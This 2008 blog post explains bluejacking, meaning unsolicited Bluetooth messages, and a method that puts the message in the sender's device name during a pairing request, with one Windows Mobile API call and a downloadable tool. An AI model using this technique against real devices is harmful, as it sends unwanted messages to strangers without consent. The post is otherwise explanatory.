By Radu Motisan Posted on September 16th, 2008 , 1246 Views (Rate 0.72)
What is BlueJacking?
Bluejacking refers to the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs or laptop computers.
This attack is usually harmless, and the most effective result is the surprise of the victim. The messages can be sent from within a relatively small range radius, because of the low power of the Bluetooth radio transmitters. Bluetooth has a very limited range, usually around 10 meters on mobile phones, but laptops can reach up to 100 meters with powerful Class 1 transmitters.
While usual Bluejack attacks are performed by sending vCards via the OBEX Protocol, I'm presenting a simpler approach.
Usually, first thing to do is to scan for nearby bluetooth enabled devices. A Bluetooth device can be detected, if it's running in a special mode called Discovarable. In this mode, the devices advertise their presence, and offer their Bluetooth address, so remote devices can open connections to them.
Part of the Bluetooth security protocol, is the authentification mechanism know as Pairing. Devices generally require pairing or prompt the owner before they allow a remote device to use any or most of their services. Some devices, such as mobile phones, usually accept OBEX business cards and notes without any pairing or prompts.
This is why the regular BlueJacking attacks use the OBEX Business card protocol.
But we can dispatch readeble messages even easier. After we have the bluetooth address of the "victim", we can simply require pairing to the remote device, and the user will get prompt in order to allow or deny the process. When this happens , the remote device receives the name of the device that initiated the pairing sequence. In this case, it's the name of our device.
So all we need to do , is to set a message instead of our bluetooth device name, and initate a pair request to the remote device, the "victim".
The result is shown below:
This snapshot was taken from a Windows Mobile 5.0 smartphone, that received this message during the pairing process.
The BlueJacking was initiated from a different pocket PC device, running a simple tool:
This tool is capable of searching for remote devices that are in discoverable mode. To be subject to this attack, a device doesn't need to be in discoverable mode, just to have the bluetooth module on, but the attacker needs to know the address.
Then the tool allows the user to define a custom message that gets set as the Bluetooth Device Name. On Windows Mobile this is achieved by setting the registry key:
Then a pair request to the remote device is transmitted using this simple bluetooth api:
BthPairRequest(&m_btaClient,4,(unsigned char *)"0000");
m_btaClient is the "victim"'s bluetooth address.
The tool is attached, download and use it at your own risk, as I am not to be held responsable for any damage resulting by it's use. This article was only created to help people better understand some of the "permitted" features of the current Bluetooth implementation.
Download the tool: bluejack